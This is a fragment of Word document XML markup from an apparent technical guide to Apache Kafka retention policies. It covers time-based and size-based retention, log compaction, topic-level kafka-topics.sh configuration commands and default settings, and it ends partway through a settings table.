        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="785"/>
    </w:p>
    <w:p w14:paraId="6E6C0B99" w14:textId="3422B90E" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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he </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>retention policy</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> defines how long Kafka retains messages in a topic’s partitions before they are deleted. Kafka retains messages based on </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>size</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and this configuration allows Kafka to automatically delete old messages, ensuring that disk space is managed effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4205D615" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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ey Concepts of Kafka Retention Policy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F2B3E0" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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og Segments</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka stores messages in </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log segments</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each partition. Each partition consists of multiple log segments, where each log segment contains a chunk of messages. Kafka uses these segments to efficiently read and write messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEB86D2" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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tention Period</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The retention period defines the duration for which Kafka retains messages in the topic. Once the retention period is exceeded, messages are eligible for deletion. This helps manage storage, particularly for high-throughput topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9FF63C" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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How Kafka Retention Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B654BB" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Kafka does </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> remove messages immediately after they expire. Instead, messages that exceed the configured retention period are eligible for deletion during log segment cleanup, which happens in the background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDD6A5D" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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can be configured to delete data based on either </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>size</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78466938" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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Types of Retention Policies in Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403F77DD" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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Time-Based Retention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka allows messages to be retained for a specific amount of time. After the configured time period expires, the messages are eligible for deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE63020" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="137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figuration</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: log.retention.ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D12978" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="137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is property determines how long Kafka should keep the messages in the log. The value is specified in milliseconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D30C560" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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Example: Retain messages for 1 day (24 hours):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2310B31E" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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og.retention.ms=86400000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B44510" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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is configuration ensures that messages older than 1 day will be deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CA555F" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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ize-Based Retention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka can also be configured to retain messages until the partition size exceeds a certain threshold. Once the log segment size exceeds the specified size, older messages are eligible for deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353A0031" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="137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figuration</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: log.retention.bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D263A1C" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="137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is property specifies the maximum size of the log for a partition. When the size exceeds this value, Kafka will delete the oldest messages to maintain the size limit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9003A4" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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Example: Retain messages until the partition size exceeds 10 GB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E85849" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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og.retention.bytes=10737418240</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8FBAB6" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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og Compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka also offers </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as an alternative retention policy. With log compaction, Kafka retains only the latest message for each key, which is useful when you are storing data that requires keeping only the most recent state for a key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFAE24A" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="137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figuration</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: log.cleanup.policy=compact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC7E242" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="137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is compaction policy is typically used in topics where the message key represents the latest state of a particular entity (like storing the latest value of a user’s record). Kafka will delete older messages with the same key and retain only the latest message for each key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3FF2B7" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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Example: Enable log compaction for a topic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4F3051" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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og.cleanup.policy=compact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFD8B76" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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mbination of Time and Size</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka allows combining both time-based and size-based retention policies. This means a topic can be configured to either retain messages until a certain time limit is reached </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> until the topic’s size exceeds a specified threshold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DC0768" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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Retention Configuration at Topic Level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C14FCF2" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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s retention policies can be configured both at the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>broker</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> level (default settings) and at the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topic</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> level (specific settings). You can override the default retention policy for specific topics by setting retention configurations at the topic level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C38936D" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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Topic-Level Retention Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C8953" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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You can use the kafka-topics.sh script to set retention configurations for a specific topic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AD0EFD" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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Time-Based Retention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Set the time-based retention for a specific topic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4724F7F2" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1377"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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topics.sh --alter --topic &lt;topic_name&gt; --config retention.ms=86400000 --bootstrap-server &lt;broker&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7048D84D" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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is will retain messages in the topic for 1 day (86400000 ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359EF690" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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ize-Based Retention</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Set the size-based retention for a specific topic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E65BE11" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1377"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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topics.sh --alter --topic &lt;topic_name&gt; --config retention.bytes=10737418240 --bootstrap-server &lt;broker&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10395E28" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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is will limit the partition size to 10 GB, and older messages will be deleted once the size exceeds this limit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DDDF0E" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137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og Compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Set the log compaction policy for a specific topic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C2CA3D" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1377"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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topics.sh --alter --topic &lt;topic_name&gt; --config cleanup.policy=compact --bootstrap-server &lt;broker&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D5822A" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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Default Retention Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EF76C7" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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By default, Kafka retains messages for </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7 days</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (log.retention.ms=604800000), and the maximum log size for each partition is unlimited. You can modify these defaults based on your use case.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAC6AE3" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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 Retention Settings Overview:</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2"/>
        <w:gridCol w:w="6613"/>
        <w:gridCol w:w="1809"/>
      </w:tblGrid>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="1C05F196" w14:textId="77777777" w:rsidTr="00684E32">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="338D61F4" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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Property</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51F39F29" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A2DD9B7" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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Default Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="4D9A021D" w14:textId="77777777" w:rsidTr="00684E32">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B11D27F" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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og.retention.ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65C52528" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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ime-based retention. Messages older than this time will be deleted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="572F5342" w14:textId="77777777" w:rsidR="00684E32" w:rsidRPr="0003272F" w:rsidRDefault="00684E32"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604800000 (7 days)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0003272F" w:rsidRPr="0003272F" w14:paraId="2051259B" w14:textId="77777777" w:rsidTr="00684E32">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
